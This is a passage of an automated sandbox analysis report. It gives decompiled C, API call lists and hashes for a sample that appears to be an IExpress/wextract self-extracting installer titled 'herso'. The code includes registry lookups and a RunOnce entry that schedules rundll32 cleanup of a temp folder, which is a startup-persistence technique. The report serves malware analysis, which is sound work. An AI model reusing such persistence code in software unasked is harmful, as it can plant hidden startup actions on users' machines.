                                                                                                                                                                                                          				_t67 = _a4;
                                                                                                                                                                                                          				_t69 = 0xd;
                                                                                                                                                                                                          				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                          				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                          				_v580 = _t37;
                                                                                                                                                                                                          				asm("movsb");
                                                                                                                                                                                                          				if(( *0x868a38 & 0x00000001) != 0) {
                                                                                                                                                                                                          					_t39 = 1;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_v576 = 0;
                                                                                                                                                                                                          					LoadStringA( *0x869a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                          					if(_v576 != 0) {
                                                                                                                                                                                                          						_t73 =  &_v576;
                                                                                                                                                                                                          						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                          						_t75 = _t16;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t43 =  *_t73;
                                                                                                                                                                                                          							_t73 = _t73 + 1;
                                                                                                                                                                                                          						} while (_t43 != 0);
                                                                                                                                                                                                          						_t84 = _v580;
                                                                                                                                                                                                          						_t74 = _t73 - _t75;
                                                                                                                                                                                                          						if(_t84 == 0) {
                                                                                                                                                                                                          							if(_t67 == 0) {
                                                                                                                                                                                                          								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                          								_t83 = _t27;
                                                                                                                                                                                                          								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                          								_t80 = _t44;
                                                                                                                                                                                                          								if(_t80 == 0) {
                                                                                                                                                                                                          									goto L6;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t75 = _t83;
                                                                                                                                                                                                          									_t74 = _t80;
                                                                                                                                                                                                          									E00861680(_t80, _t83,  &_v576);
                                                                                                                                                                                                          									goto L23;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t76 = _t67;
                                                                                                                                                                                                          								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                          								_t85 = _t24;
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									_t55 =  *_t76;
                                                                                                                                                                                                          									_t76 = _t76 + 1;
                                                                                                                                                                                                          								} while (_t55 != 0);
                                                                                                                                                                                                          								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                          								_t83 = _t25 + _t74;
                                                                                                                                                                                                          								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                          								_t80 = _t44;
                                                                                                                                                                                                          								if(_t80 == 0) {
                                                                                                                                                                                                          									goto L6;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									E0086171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                          									goto L23;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0086171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0086681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E008667C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "herso", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0086681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E008667C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "herso", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00866CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086453d
                                                                                                                                                                                                          0x00864554
                                                                                                                                                                                                          0x0086455a
                                                                                                                                                                                                          0x0086455a
                                                                                                                                                                                                          0x0086455a
                                                                                                                                                                                                          0x00864525
                                                                                                                                                                                                          0x0086468c

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                          • MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000065), ref: 008645A3
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000065), ref: 008645E3
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000002), ref: 0086460D
                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 00864630
                                                                                                                                                                                                          • MessageBoxA.USER32(?,00000000,herso,00000000), ref: 00864666
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 0086466F
                                                                                                                                                                                                            • Part of subcall function 0086681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0086686E
                                                                                                                                                                                                            • Part of subcall function 0086681F: GetSystemMetrics.USER32(0000004A), ref: 008668A7
                                                                                                                                                                                                            • Part of subcall function 0086681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 008668CC
                                                                                                                                                                                                            • Part of subcall function 0086681F: RegQueryValueExA.ADVAPI32(?,00861140,00000000,?,?,0000000C), ref: 008668F4
                                                                                                                                                                                                            • Part of subcall function 0086681F: RegCloseKey.ADVAPI32(?), ref: 00866902
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                          • String ID: LoadString() Error. Could not load string resource.$herso
                                                                                                                                                                                                          • API String ID: 3244514340-1944528445
                                                                                                                                                                                                          • Opcode ID: a1920f022478b868445f151794235f325e591aa35404e2191e604e3dfd642892
                                                                                                                                                                                                          • Instruction ID: cf4616718ed0a6d44b11a6c52a5438071b21bab17ba0f953e7d5ae28a763c8e6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1920f022478b868445f151794235f325e591aa35404e2191e604e3dfd642892
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA512672900219AFDB219F28CC48BAABB69FF46304F165194FD1AF7241DB71DD05CB61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E00862773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				char _v269;
                                                                                                                                                                                                          				CHAR* _v276;
                                                                                                                                                                                                          				int _v280;
                                                                                                                                                                                                          				void* _v284;
                                                                                                                                                                                                          				int _v288;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                                                          				int _t45;
                                                                                                                                                                                                          				int* _t50;
                                                                                                                                                                                                          				CHAR* _t52;
                                                                                                                                                                                                          				CHAR* _t61;
                                                                                                                                                                                                          				char* _t62;
                                                                                                                                                                                                          				int _t63;
                                                                                                                                                                                                          				CHAR* _t64;
                                                                                                                                                                                                          				signed int _t65;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t52 = __ecx;
                                                                                                                                                                                                          				_t23 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                          				_t62 = _a4;
                                                                                                                                                                                                          				_t50 = 0;
                                                                                                                                                                                                          				_t61 = __ecx;
                                                                                                                                                                                                          				_v276 = _t62;
                                                                                                                                                                                                          				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                          				if( *_t62 != 0x23) {
                                                                                                                                                                                                          					_t63 = 0x104;
                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t64 = _t62 + 1;
                                                                                                                                                                                                          					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                          					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                          					_t63 = 0x104;
                                                                                                                                                                                                          					_t34 = _v269;
                                                                                                                                                                                                          					if(_t34 == 0x53) {
                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                          						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						if(_t34 == 0x57) {
                                                                                                                                                                                                          							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_push(_t52);
                                                                                                                                                                                                          							_v288 = 0x104;
                                                                                                                                                                                                          							E00861781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                          							_t59 = 0x104;
                                                                                                                                                                                                          							E0086658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                          							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                          								L16:
                                                                                                                                                                                                          								_t59 = _t63;
                                                                                                                                                                                                          								E0086658A(_t61, _t63, _v276);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								if(RegQueryValueExA(_v284, 0x861140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                          									_t45 = _v280;
                                                                                                                                                                                                          									if(_t45 != 2) {
                                                                                                                                                                                                          										L9:
                                                                                                                                                                                                          										if(_t45 == 1) {
                                                                                                                                                                                                          											goto L10;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                          											_t45 = _v280;
                                                                                                                                                                                                          											goto L9;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t59 = 0x104;
                                                                                                                                                                                                          											E00861680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                          											L10:
                                                                                                                                                                                                          											_t50 = 1;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								RegCloseKey(_v284);
                                                                                                                                                                                                          								L15:
                                                                                                                                                                                                          								if(_t50 == 0) {
                                                                                                                                                                                                          									goto L16;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                          			}
























                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CharUpperA.USER32(B82E2007,00000000,00000000,00000000), ref: 008627A8
                                                                                                                                                                                                          • CharNextA.USER32(0000054D), ref: 008627B5
                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 008627BC
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00862829
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,00861140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00862852
                                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00862870
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008628A0
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 008628AA
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 008628B9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 008627E4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                          • API String ID: 2659952014-2428544900
                                                                                                                                                                                                          • Opcode ID: c62b548e544eb7d1ca769ce397ad3c97e6ff30a09d531ea96db3b49a7047107e
                                                                                                                                                                                                          • Instruction ID: c7783b8d520922d38472b43f9ae940d02927fb14c8c32ee714d15e5101d09e45
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c62b548e544eb7d1ca769ce397ad3c97e6ff30a09d531ea96db3b49a7047107e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7441A071E0012CABDB249B649C85AFA7BBDFB15700F0640E9F549E3101DBB48E858FA2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                                          			E00862267() {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				char _v836;
                                                                                                                                                                                                          				void* _v840;
                                                                                                                                                                                                          				int _v844;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t19;
                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                          				intOrPtr* _t42;
                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                          				void* _t47;
                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                          				signed int _t51;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t19 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                          				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                          				if( *0x868530 != 0) {
                                                                                                                                                                                                          					_push(_t49);
                                                                                                                                                                                                          					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                          						_push(_t38);
                                                                                                                                                                                                          						_v844 = 0x238;
                                                                                                                                                                                                          						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                          							_push(_t47);
                                                                                                                                                                                                          							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                          							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                          								E0086658A( &_v268, 0x104, 0x861140);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                          							E0086171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                          							_t42 =  &_v836;
                                                                                                                                                                                                          							_t45 = _t42 + 1;
                                                                                                                                                                                                          							_pop(_t47);
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								_t33 =  *_t42;
                                                                                                                                                                                                          								_t42 = _t42 + 1;
                                                                                                                                                                                                          							} while (_t33 != 0);
                                                                                                                                                                                                          							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                          						_pop(_t38);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_pop(_t49);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                          			}




















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 008622A3
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 008622D8
                                                                                                                                                                                                          • memset.MSVCRT ref: 008622F5
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 00862305
                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0086236E
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0086237A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00862321
                                                                                                                                                                                                          • wextract_cleanup0, xrefs: 0086227C, 008622CD, 00862363
                                                                                                                                                                                                          • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0086232D
                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00862299
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                          • API String ID: 3027380567-2554356261
                                                                                                                                                                                                          • Opcode ID: 96d67d3cb35d55b447b3a1d23522ac07955b32b630e7fb95cc1dae788ee53f96
                                                                                                                                                                                                          • Instruction ID: c2b70284af2f3de93c09b3704fb2902241385d9ad0a48ce81613d410f81f8bb0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96d67d3cb35d55b447b3a1d23522ac07955b32b630e7fb95cc1dae788ee53f96
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E131B471A00218ABDB219B55DC49FEA7B7CFB14700F0501E9F50DEA251EB75AB88CE51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                          			E00863100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                          				struct HWND__* _t16;
                                                                                                                                                                                                          				struct HWND__* _t33;
                                                                                                                                                                                                          				struct HWND__* _t34;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t8 = _a8 - 0xf;
                                                                                                                                                                                                          				if(_t8 == 0) {
                                                                                                                                                                                                          					if( *0x868590 == 0) {
                                                                                                                                                                                                          						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                          						 *0x868590 = 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t11 = _t8 - 1;
                                                                                                                                                                                                          				if(_t11 == 0) {
                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                          					EndDialog(_a4, ??);
                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t15 = _t11 - 0x100;
                                                                                                                                                                                                          				if(_t15 == 0) {
                                                                                                                                                                                                          					_t16 = GetDesktopWindow();
                                                                                                                                                                                                          					_t33 = _a4;
                                                                                                                                                                                                          					E008643D0(_t33, _t16);
                                                                                                                                                                                                          					SetDlgItemTextA(_t33, 0x834,  *0x868d4c);
                                                                                                                                                                                                          					SetWindowTextA(_t33, "herso");
                                                                                                                                                                                                          					SetForegroundWindow(_t33);
                                                                                                                                                                                                          					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                          					 *0x8688b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                          					SetWindowLongA(_t34, 0xfffffffc, E008630C0);
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t15 != 1) {
                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_a12 != 6) {
                                                                                                                                                                                                          					if(_a12 != 7) {
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L7;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                          				goto L8;
                                                                                                                                                                                                          			}









                                                                                                                                                                                                          0x0086317d
                                                                                                                                                                                                          0x0086318b
                                                                                                                                                                                                          0x0086319e
                                                                                                                                                                                                          0x008631a3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008631ad
                                                                                                                                                                                                          0x00863120
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086312a
                                                                                                                                                                                                          0x00863134
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863134
                                                                                                                                                                                                          0x0086312c
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EndDialog.USER32(?,00000000), ref: 0086313B
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0086314B
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,00000834), ref: 0086316A
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,herso), ref: 00863176
                                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 0086317D
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000834), ref: 00863185
                                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000FC), ref: 00863190
                                                                                                                                                                                                          • SetWindowLongA.USER32(00000000,000000FC,008630C0), ref: 008631A3
                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 008631CA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                          • String ID: herso
                                                                                                                                                                                                          • API String ID: 3785188418-3992069730
                                                                                                                                                                                                          • Opcode ID: a3508c762be2b3bc47381a43c782c7d4980fe7d0b20f7addea1d5cf1dac7e47e
                                                                                                                                                                                                          • Instruction ID: 223c8366f1ce11e0392b50ca2571c9a0a2bc0a8cc94424a095986aace8c24681
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3508c762be2b3bc47381a43c782c7d4980fe7d0b20f7addea1d5cf1dac7e47e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED11D331644255FBDB115F24AC0CB5A3A64FB4B724F131611F926E22E0DFF59A41CB52
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                          			E0086468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                          				long _t4;
                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                          				CHAR* _t14;
                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                          				long _t16;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t14 = __ecx;
                                                                                                                                                                                                          				_t11 = __edx;
                                                                                                                                                                                                          				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                          				_t16 = _t4;
                                                                                                                                                                                                          				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                          					if(_t16 == 0) {
                                                                                                                                                                                                          						L5:
                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                          					if(_t15 == 0) {
                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                          					FreeResource(_t15);
                                                                                                                                                                                                          					return _t16;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t4;
                                                                                                                                                                                                          			}









                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                          • memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                          • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
